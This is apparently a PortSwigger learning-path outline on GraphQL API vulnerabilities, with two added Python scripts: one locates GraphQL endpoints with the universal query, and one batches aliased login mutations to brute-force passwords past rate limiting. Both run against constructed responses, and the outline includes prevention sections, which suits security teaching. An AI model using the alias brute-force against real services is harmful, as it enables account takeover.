This learning path covers common GraphQL API vulnerabilities that arise from implementation and design flaws. You'll learn how to find GraphQL endpoints, bypass some common defenses, and exploit a range of GraphQL API vulnerabilities.
Finding GraphQL endpoints
Finding GraphQL endpoints
Universal queries
Common endpoint names
Common endpoint names - Continued
Request methods
Initial testing
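The endpoint-discovery steps listed in this section (the universal query, common endpoint names, and trying both request methods), as an added example that is not part of the original page or of PortSwigger's own tooling. The candidate path list is an assumption about typical endpoint names, the `send` callable stands in for a real HTTP client, and the responses in `fake_send` are constructed so the script runs offline:

```python
"""Added example (not PortSwigger's code): probe candidate paths with the
universal query to locate a GraphQL endpoint.

Every GraphQL endpoint answers `query{__typename}`, so sending it to common
endpoint names over both POST and GET reveals the endpoint and which request
methods it accepts. The HTTP transport is abstracted as a `send` callable
(an assumption); the responses in `fake_send` are constructed.
"""
import json
from urllib.parse import urlencode, urlsplit

UNIVERSAL_QUERY = "query{__typename}"

# Common endpoint names (assumed list), tried relative to the site root.
CANDIDATE_PATHS = ["/graphql", "/api", "/api/graphql", "/graphql/api", "/graphql/graphql"]


def build_probes(base_url):
    """Yield (method, url, body) for each candidate path: a POST with a JSON
    body and a GET with the query in the URL, because some endpoints only
    accept one of the two methods."""
    root = base_url.rstrip("/")
    for path in CANDIDATE_PATHS:
        yield ("POST", root + path, json.dumps({"query": UNIVERSAL_QUERY}))
        yield ("GET", root + path + "?" + urlencode({"query": UNIVERSAL_QUERY}), None)


def looks_like_graphql(body):
    """Return True if a response body is a GraphQL envelope.

    A hit on the universal query is {"data": {"__typename": "Query"}}. A body
    whose top level is {"errors": [...]} also identifies a GraphQL server,
    since a server that rejects the method or content type still answers in
    its own error envelope rather than with a framework 404 page."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return False
    if not isinstance(doc, dict):
        return False
    data = doc.get("data")
    if isinstance(data, dict) and "__typename" in data:
        return True
    errors = doc.get("errors")
    return isinstance(errors, list) and len(errors) > 0


def discover(base_url, send):
    """Run every probe through send(method, url, body) -> (status, text) and
    return [(method, url, status)] for the responses that look like GraphQL."""
    hits = []
    for method, url, body in build_probes(base_url):
        status, text = send(method, url, body)
        if looks_like_graphql(text):
            hits.append((method, url, status))
    return hits


def fake_send(method, url, body):
    """Constructed target standing in for a real HTTP client: /api is a
    GraphQL endpoint that serves POST and refuses GET with a GraphQL error;
    every other path is a plain HTML 404."""
    path = urlsplit(url).path
    if path == "/api":
        if method == "POST":
            return 200, json.dumps({"data": {"__typename": "Query"}})
        return 405, json.dumps({"errors": [{"message": "GET requests are not allowed"}]})
    return 404, "<html><body>Not Found</body></html>"


if __name__ == "__main__":
    for method, url, status in discover("https://example.com", fake_send):
        print(f"{status} {method} {url}")
```

Against a real target, replace `fake_send` with a function that performs the request (for example with `requests.request`) and returns the status code and body text; the GET probe that comes back with a GraphQL error envelope is still a find, because it tells you the endpoint exists and which method it wants.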
Exploiting unsanitized arguments
Exploiting unsanitized arguments
Exploiting unsanitized arguments - Continued
Discovering schema information
Discovering schema information
Using introspection
Probing for introspection
Running a full introspection query
Visualizing introspection results
Suggestions
Suggestions - Continued
Lab: Accessing private GraphQL posts APPRENTICE
Lab: Accidental exposure of private GraphQL fields PRACTITIONER
Bypassing GraphQL introspection defenses
Bypassing GraphQL introspection defenses
Bypassing GraphQL introspection defenses - Continued
Lab: Finding a hidden GraphQL endpoint PRACTITIONER
Bypassing rate limiting using aliases
Bypassing rate limiting using aliases
Bypassing rate limiting using aliases - Continued
Lab: Bypassing GraphQL brute force protections PRACTITIONER
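The alias technique covered in this section, as an added example that is not part of the original page or of PortSwigger's own tooling. The mutation shape `login(input: {username, password}) { token success }` is an assumption about the target's schema, and the server response is constructed so the script runs offline:

```python
"""Added example (not PortSwigger's code): pack many login attempts into one
GraphQL request using aliases.

Rate limiting that counts HTTP requests does not see that a single request
carries dozens of operations. Each aliased copy of the mutation runs with a
different password, and the alias names let the response be mapped back to
the candidate that succeeded. The mutation shape is an assumed schema.
"""
import json


def graphql_string(value):
    """Quote a Python str as a GraphQL string literal. GraphQL uses the same
    double-quoted form and escape sequences as JSON for ASCII input, so
    json.dumps is adequate here."""
    return json.dumps(value)


def build_alias_batch(username, passwords, operation="login"):
    """Return one mutation document with an aliased `operation` per password.
    Aliases must be valid GraphQL names, so they are derived from the index
    rather than from the password itself."""
    lines = []
    for i, pw in enumerate(passwords):
        lines.append(
            f"bruteforce{i}: {operation}(input: {{username: {graphql_string(username)}, "
            f"password: {graphql_string(pw)}}}) {{ token success }}"
        )
    return "mutation {\n  " + "\n  ".join(lines) + "\n}"


def successful_passwords(response_text, passwords):
    """Walk the response's data object alias by alias and return the
    passwords whose operation reported success."""
    doc = json.loads(response_text)
    data = doc.get("data") or {}
    hits = []
    for i, pw in enumerate(passwords):
        result = data.get(f"bruteforce{i}")
        if isinstance(result, dict) and result.get("success") is True:
            hits.append(pw)
    return hits


def fake_server_response(username, passwords, real_password="letmein"):
    """Constructed response from a target that accepts `real_password`;
    it stands in for the HTTP round trip so the script runs offline."""
    data = {}
    for i, pw in enumerate(passwords):
        ok = username == "carlos" and pw == real_password
        data[f"bruteforce{i}"] = {"token": "tok-constructed" if ok else None, "success": ok}
    return json.dumps({"data": data})


if __name__ == "__main__":
    wordlist = ["123456", "password", "letmein", "qwerty"]
    query = build_alias_batch("carlos", wordlist)
    print(query)
    print(successful_passwords(fake_server_response("carlos", wordlist), wordlist))
```

The whole document is sent as the `query` field of a single POST, so a limiter keyed on request count sees one request; a defence has to count operations inside the document (or the resolver calls they trigger) instead, which is the point the later "Preventing GraphQL brute-force attacks" section makes.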
GraphQL CSRF
GraphQL CSRF
How do CSRF over GraphQL vulnerabilities arise?
Lab: Performing CSRF exploits over GraphQL PRACTITIONER
Preventing GraphQL attacks
Preventing GraphQL attacks
Preventing GraphQL brute-force attacks
Preventing GraphQL brute-force attacks
Preventing CSRF over GraphQL
Preventing CSRF over GraphQL